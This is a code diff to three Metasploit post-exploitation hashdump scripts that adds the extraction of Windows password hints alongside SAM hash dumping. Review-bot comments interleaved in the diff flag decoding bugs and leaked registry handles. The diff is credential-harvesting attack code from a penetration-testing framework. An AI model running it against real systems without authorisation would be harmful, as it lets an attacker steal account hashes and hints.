diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb
index f21e8be4c0..1a9c9266f2 100644
--- a/modules/post/windows/gather/hashdump.rb
+++ b/modules/post/windows/gather/hashdump.rb
@@ -74,6 +74,19 @@ class Metasploit3 < Msf::Post
 print_status("Decrypting user keys...")
 users = decrypt_user_keys(hbootkey, users)
+ print_status("Dumping password hints...")
+ print_line()
+ hint_count = 0
+ users.keys.sort{|a,b| a<=>b}.each do |rid|
+ #If we have a hint then print it
+ if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
+ print_line "#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\""
+ hint_count += 1
+ end
+ end
+ print_line "No users with password hints on this system" if hint_count == 0
+ print_line()
 print_status("Dumping password hashes...")
 print_line()
 print_line()
@@ -88,11 +101,6 @@ class Metasploit3 < Msf::Post
 :type => "smb_hash"
 )
- #If we have a hint, decode and add to the hashstring
- if !users[rid][:UserPasswordHint].nil?
- hashstring += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
- end
-
 print_line hashstring
 end
 print_line()
@@ -171,6 +179,7 @@ class Metasploit3 < Msf::Post
 users[usr.to_i(16)][:F] = uk.query_value("F").data
 users[usr.to_i(16)][:V] = uk.query_value("V").data
+ #Attempt to get Hints (from Win7/Win8 Location)
 begin
 users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
 rescue ::Rex::Post::Meterpreter::RequestError
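Review bot: The new `print_line "#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\""` prints the Win7/Win8 hint undecoded: the lines removed in the next hunk hex-unpacked it and ran it through `decode_windows_hint`, but the read in this file's later hunk still stores `uk.query_value("UserPasswordHint").data` as-is, so the console gets the raw registry bytes and the `.length > 0` guard is satisfied by them. Of the three files in this commit only scripts/meterpreter/hashdump.rb moves the decode to the read; this module needs the same one-line change on the Win7/Win8 path, `users[usr.to_i(16)][:UserPasswordHint] = decode_windows_hint(uk.query_value("UserPasswordHint").data.unpack("H*")[0])`. The XP-location value is stored without any decode, so it is presumably already a plain string and should not go through the same call. The enclosing method starts before this hunk.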
@@ -188,6 +197,17 @@ class Metasploit3 < Msf::Post
 rid = r.type
 users[rid] ||= {}
 users[rid][:Name] = usr
+
+ #Attempt to get Hints (from WinXP Location) only if it's not set yet
+ if users[rid][:UserPasswordHint].nil?
+ begin
+ uk_hint = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
+ users[rid][:UserPasswordHint] = uk_hint.query_value("").data
+ rescue ::Rex::Post::Meterpreter::RequestError
+ users[rid][:UserPasswordHint] = nil
+ end
+ end
+
 uk.close
 end
 ok.close
diff --git a/modules/post/windows/gather/smart_hashdump.rb b/modules/post/windows/gather/smart_hashdump.rb
index 1bc387e744..c61b25222c 100644
--- a/modules/post/windows/gather/smart_hashdump.rb
+++ b/modules/post/windows/gather/smart_hashdump.rb
@@ -141,6 +141,7 @@ class Metasploit3 < Msf::Post
 users[usr.to_i(16)][:F] = uk.query_value("F").data
 users[usr.to_i(16)][:V] = uk.query_value("V").data
+ #Attempt to get Hints (from Win7/Win8 Location)
 begin
 users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
 rescue ::Rex::Post::Meterpreter::RequestError
@@ -158,6 +159,17 @@ class Metasploit3 < Msf::Post
 rid = r.type
 users[rid] ||= {}
 users[rid][:Name] = usr
+
+ #Attempt to get Hints (from WinXP Location) only if it's not set yet
+ if users[rid][:UserPasswordHint].nil?
+ begin
+ uk_hint = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
+ users[rid][:UserPasswordHint] = uk_hint.query_value("").data
+ rescue ::Rex::Post::Meterpreter::RequestError
+ users[rid][:UserPasswordHint] = nil
+ end
+ end
+
 uk.close
 end
 ok.close
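Review bot: The `uk_hint` handle returned by `@client.sys.registry.open_key(...)` is never closed, whereas `uk` is released by `uk.close` two lines below, so every successful XP-location lookup leaks a registry handle in the target process for the life of the session. Because `open_key` can itself raise and leave `uk_hint` unset, the close belongs in an `ensure` clause of the same `begin`: `ensure` / `uk_hint.close if uk_hint`. The rescue body reassigns `nil` to a value the surrounding `if users[rid][:UserPasswordHint].nil?` has already established is nil; harmless, but a comment saying the fallback is intentional would read better than the redundant assignment. The same open-without-close pattern is added to smart_hashdump.rb and scripts/meterpreter/hashdump.rb in this commit, and the enclosing loop and method start before this hunk.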
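Review bot: As in the hashdump module above, the `uk_hint` key opened with `open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)` is read and then dropped without a close, unlike `uk` which gets `uk.close` right after. Add `ensure` / `uk_hint.close if uk_hint` to the `begin` block so the handle is released on both the success and the rescued-error path. The enclosing loop starts before this hunk.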
@@ -290,20 +302,24 @@ class Metasploit3 < Msf::Post
 print_status("\tDecrypting user keys...")
 users = decrypt_user_keys(hbootkey, users)
- print_status("\tDumping password hashes...")
+ print_status("\tDumping password hints...")
+ hint_count = 0
+ users.keys.sort{|a,b| a<=>b}.each do |rid|
+ #If we have a hint then print it
+ if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
+ print_good("#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\"")
+ hint_count += 1
+ end
+ end
+ print_good("No users with password hints on this system") if hint_count == 0
+ print_status("\tDumping password hashes...")
 users.keys.sort{|a,b| a<=>b}.each do |rid|
 # next if guest account or support account
 next if rid == 501 or rid == 1001
 collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n"
- #If we have a hint, decode and populate hint_string
- hint_string = ""
- if !users[rid][:UserPasswordHint].nil?
- hint_string += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
- end
-
- print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::#{hint_string}")
+ print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::")
 session.framework.db.report_auth_info(
 :host => host,
 :port => @smb_port,
@@ -313,8 +329,7 @@ class Metasploit3 < Msf::Post
 :type => "smb_hash"
 )
 end
-
-
+
 rescue ::Interrupt
 raise $!
 rescue ::Rex::Post::Meterpreter::RequestError => e
diff --git a/scripts/meterpreter/hashdump.rb b/scripts/meterpreter/hashdump.rb
index efea082bb2..3f2fcb8471 100644
--- a/scripts/meterpreter/hashdump.rb
+++ b/scripts/meterpreter/hashdump.rb
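Review bot: `print_good("#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\"")` emits the hint without the `decode_windows_hint(...unpack("H*")[0])` step the removed lines applied, and this file's earlier hunk leaves the Win7/Win8 read as raw `uk.query_value("UserPasswordHint").data`, so smart_hashdump will print undecoded bytes for every Win7/8 hint; only the meterpreter script in this commit decodes at the read, and this module should match it. Two style points in the same block: `print_good("No users with password hints on this system")` flags a negative result with the success marker and is the only line here without the `\t` prefix used by the surrounding `print_status`/`print_good` calls, so `print_status("\tNo users with password hints on this system")` would fit the file's convention. The enclosing method starts before this hunk and the hash loop continues into the next one.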
@@ -102,8 +102,9 @@ def capture_user_keys
 users[usr.to_i(16)][:F] = uk.query_value("F").data
 users[usr.to_i(16)][:V] = uk.query_value("V").data
+ #Attempt to get Hints (from Win7/Win8 Location)
 begin
- users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
+ users[usr.to_i(16)][:UserPasswordHint] = decode_windows_hint(uk.query_value("UserPasswordHint").data.unpack("H*")[0])
 rescue ::Rex::Post::Meterpreter::RequestError
 users[usr.to_i(16)][:UserPasswordHint] = nil
 end
@@ -119,6 +120,17 @@ def capture_user_keys
 rid = r.type
 users[rid] ||= {}
 users[rid][:Name] = usr
+
+ #Attempt to get Hints (from WinXP Location) only if it's not set yet
+ if users[rid][:UserPasswordHint].nil?
+ begin
+ uk_hint = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
+ users[rid][:UserPasswordHint] = uk_hint.query_value("").data
+ rescue ::Rex::Post::Meterpreter::RequestError
+ users[rid][:UserPasswordHint] = nil
+ end
+ end
+
 uk.close
 end
 ok.close
@@ -242,6 +254,19 @@ if client.platform =~ /win32|win64/
 print_status("Decrypting user keys...")
 users = decrypt_user_keys(hbootkey, users)
+ print_status("Dumping password hints...")
+ print_line()
+ hint_count = 0
+ users.keys.sort{|a,b| a<=>b}.each do |rid|
+ #If we have a hint then print it
+ if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
+ print_line "#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\""
+ hint_count += 1
+ end
+ end
+ print_line("No users with password hints on this system") if hint_count == 0
+ print_line()
 print_status("Dumping password hashes...")
 print_line()
 print_line()
@@ -256,11 +281,6 @@ if client.platform =~ /win32|win64/
 :type => "smb_hash"
 )
- #If we have a hint, decode and add to the hashstring
- if !users[rid][:UserPasswordHint].nil?
- hashstring += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
- end
-
 print_line hashstring
 end
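Review bot: Moving `decode_windows_hint(...)` inside the `begin` means a failure raised by the decode rather than by the registry query is not covered by `rescue ::Rex::Post::Meterpreter::RequestError` and would abort the entire key capture over one malformed hint value; whether decode_windows_hint can raise on odd-length or otherwise unexpected input is not visible here, but a hint is best-effort data and should not take the hash dump down with it. Keep the raw `uk.query_value("UserPasswordHint").data` read in the rescued block as before and decode the result afterwards under its own guard that degrades to `nil`, so a bad hint is treated the same as a missing one. capture_user_keys continues outside this hunk.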
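Review bot: The `uk_hint` handle from `@client.sys.registry.open_key(...)` is never closed here either, while the sibling `uk` key is released with `uk.close` immediately below; add `ensure` / `uk_hint.close if uk_hint` to the `begin` so the handle is freed whether the query succeeds or the `RequestError` is rescued. The rest of capture_user_keys is outside this hunk.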
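Review bot: The hints are only written to the console, while the hashes printed right after are also stored through `session.framework.db.report_auth_info` with `:type => "smb_hash"` (visible in the following hunk); a password hint is credential-adjacent data an operator will want in the database with the hash rather than scrolled off the terminal, and the previous inline "(Hint: ...)" form at least kept it on the same line as the hash it belonged to. If the script has access to a notes or loot API through the same `framework.db`, record each `users[rid][:Name]` / hint pair there in this loop. The script body continues outside this hunk.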